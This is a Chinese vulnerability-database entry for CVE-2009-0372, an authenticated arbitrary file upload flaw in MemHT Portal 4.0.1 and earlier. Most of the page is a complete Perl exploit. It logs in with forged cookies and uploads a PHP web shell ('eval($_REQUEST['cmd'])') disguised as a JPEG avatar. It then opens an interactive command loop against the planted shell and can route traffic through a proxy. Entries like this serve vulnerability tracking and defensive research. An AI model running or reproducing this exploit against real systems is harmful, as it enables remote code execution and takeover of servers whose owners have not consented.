Memht Miltenovik Manojlo MemHT Portal index.php任意文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117285 漏洞类型 输入验证
发布时间 2009-01-25 更新时间 2009-02-02
CVE编号 CVE-2009-0372 CNNVD-ID CNNVD-200901-465
漏洞平台 PHP CVSS评分 6.5
|漏洞来源
https://www.exploit-db.com/exploits/7859
https://cxsecurity.com/issue/WLB-2009020078
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200901-465
|漏洞详情
MiltenovikManojloMemHTPortal4.0.1及之前版本中的index.php存在未限制文件上传漏洞。远程认证用户可以借助一个用户编辑剖面图行动,先上传一个带有可执行性扩展名和图像内容的文件,然后再借助一个对images/avatar/uploaded/中的文件的直接请求来访问它,从而实现任意代码执行。
|漏洞EXP
#!/usr/bin/perl 
# MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit
# by yeat - staker[at]hotmail[dot]it

use Getopt::Std;
use Digest::MD5('md5_hex');
use LWP::UserAgent;


getopts('p:',\my %opts);

my ($host,$file,$id,$username,$password) = @ARGV;

my $http = new LWP::UserAgent;
my $u_agent = "Lynx (textmode)";
my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password);


Main::RunExploit();


# Main Package

package Main;


sub Usage {

return print <<EOF;
+--------------------------------------------------------------+
| MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit |
+--------------------------------------------------------------+
by yeat - staker[at]hotmail[dot]it

Usage: perl xpl.pl host/path file id user pass [OPTIONS]
host: target host and memht path
file: file to upload
user: valid username
pass: valid password
id: user id

Options:

-p [specify a proxy] [server]:[port]

Example: 
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure 
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure -p 213.151.89.109:80

EOF

}


sub RunExploit 
{    
    if (defined $opts{p}) {
        HTTP::Proxy($opts{p});
    }
    
    if (@ARGV < 5 || @ARGV > 7) {
        Main::Usage();
    }
    else { 
        HTTP::UserAgent($u_agent);
        MemHT::Login();     
        MemHT::Exploit($file);
    }    
}




# MemHT Exploit Package

package MemHT;

sub Exploit 
{
    my $resp;
    my $file = shift(@_);
    my $path = "/index.php?page=users&op=editProfile";

    my $data = {
        chg_email => 'yeat@doesntexist.net',
        avatar    => [
                      undef,
                      $file,
                      Content_Type => 'image/jpeg',
                      Content      => '<?php error_reporting(E_ALL); eval($_REQUEST[\'cmd\']); ?>',
                      # Content => 'Here you can write everything :) this is an example!',
                     ],
        chg       => 'true',
        Submit    => 'Modify',
    };  
    
    my $send = $http->post('http://'.$host.$path,
                           $data,
                           Content_Type => 'multipart/form-data',
                          );
    
    if ($send->as_string =~ m{logout}i) {
        print "File Uploaded! / $host/images/avatar/uploaded/$file\n\n";
        
        while (1) {
           print "\n[yeat-PHPshell]:~# ";
           chomp(my $content = <STDIN>);
           $resp = HTTP::GET("$host/images/avatar/uploaded/$file?cmd=$content");
           print $resp->content;
        }                         
    }
    else {
        print "Exploit Failed!\n";
        exit;
    }     
}   
           

sub Login
{
    HTTP::Cookies($cookies);
    my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage');
    
    if ($response->content =~ /access denied/i) {
        print "Login Failed!\n";
        exit;
    }
}           
           
                                 

# HTTP Package

package HTTP;


sub Cookies 
{
    return $http->default_header('Cookie' => $_[0]);
}

sub UserAgent 
{
    return $http->agent($_[0]);
}    

sub GET 
{    
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->get('http://'.$_[0]);
    }    
    else {
        return $http->get($_[0]);
    }    
}
    
sub POST 
{   
    if ($_[0] !~ m{^http://(.+?)$}i) {
        return $http->post('http://'.$_[0]);
    }    
    else {
        return $http->post($_[0]);
    }    
}
    
sub http_header 
{
    return $http->default_header($_[0]);
}            
    
sub Proxy 
{
    return $http->proxy('http', 'http://'.$_[0]);   
}   

# milw0rm.com [2009-01-25]
|参考资料

来源:BID
名称:33424
链接:http://www.securityfocus.com/bid/33424
来源:XF
名称:memht-avatar-file-upload(48199)
链接:http://xforce.iss.net/xforce/xfdb/48199
来源:MILW0RM
名称:7859
链接:http://www.milw0rm.com/exploits/7859
来源:SECUNIA
名称:33626
链接:http://secunia.com/advisories/33626